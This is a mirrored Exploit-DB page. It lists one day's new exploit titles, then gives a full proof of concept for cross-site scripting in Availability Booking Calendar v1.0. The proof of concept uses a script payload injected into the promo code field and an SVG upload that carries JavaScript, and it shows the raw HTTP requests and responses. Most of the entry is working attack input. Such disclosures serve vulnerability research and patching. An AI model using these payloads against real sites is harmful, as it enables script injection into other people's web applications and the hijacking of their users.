bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51626.txt
Exploit-DB c18d9953a2 DB: 2023-07-29 
22 changes to exploits/shellcodes/ghdb

Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping

Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities

Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS)

Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities

Joomla HikaShop 4.7.4 - Reflected XSS

Joomla VirtueMart Shopping Cart 4.0.12 - Reflected XSS

mooDating 1.2 - Reflected Cross-site scripting (XSS)

October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)

PaulPrinting CMS - (Search Delivery) Cross Site Scripting

Perch v3.2 - Persistent Cross Site Scripting (XSS)

RosarioSIS 10.8.4 - CSV Injection

WordPress Plugin AN_Gradebook 5.0.1 - SQLi

Zomplog 3.9 - Cross-site scripting (XSS)

zomplog 3.9 - Remote Code Execution (RCE)
copyparty 1.8.2 - Directory Traversal
copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)

GreenShot  1.2.10 - Insecure Deserialization Arbitrary Code Execution

mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory

Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)
2023-07-29 00:16:43 +00:00

114 lines
No EOL
2.9 KiB
Text
Raw Blame History

# Exploit Title: Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS)
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Tested on: Ubuntu 20.04
# Blog: http://msecureltd.blogspot.com
XSS #1:
Steps to Reproduce:
1. Browse to Bookings
2. Select All Bookings
3. Edit booking and select Promo Code
4. Enter payload TEST"><script>alert(`XSS`)</script>
// HTTP POST request
POST /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]
[...]
edit_booking=1&calendars_price=900&extra_price=0&tax=10&deposit=91&promo_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create_booking=1
[...]
// HTTP response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 205
[...]
// HTTP GET request to Bookings page
GET /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]
// HTTP response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 33590
[...]
[...]
<label class="control-label" for="promo_code">Promo code:</label>
<input id="promo_code" class="form-control input-sm" type="text" name="promo_code" size="25" value=TEST"><script>alert(`XSS`)</script>" title="Promo code" placeholder="">
</div>
[...]
Unrestricted File Upload #1:
// SVG file contents
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(`XSS`);
</script>
</svg>
Steps to Reproduce:
1. Browse My Account
2. Image Browse -> Upload
3. Then right click on image
4. Select Open Image in New Tab
// HTTP POST request
POST /AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]
[...]
-----------------------------13831219578609189241212424546
Content-Disposition: form-data; name="img"; filename="xss.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(`XSS`);
</script>
</svg>
[...]
// HTTP response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 190
[...]
Reference in a new issue View git blame Copy permalink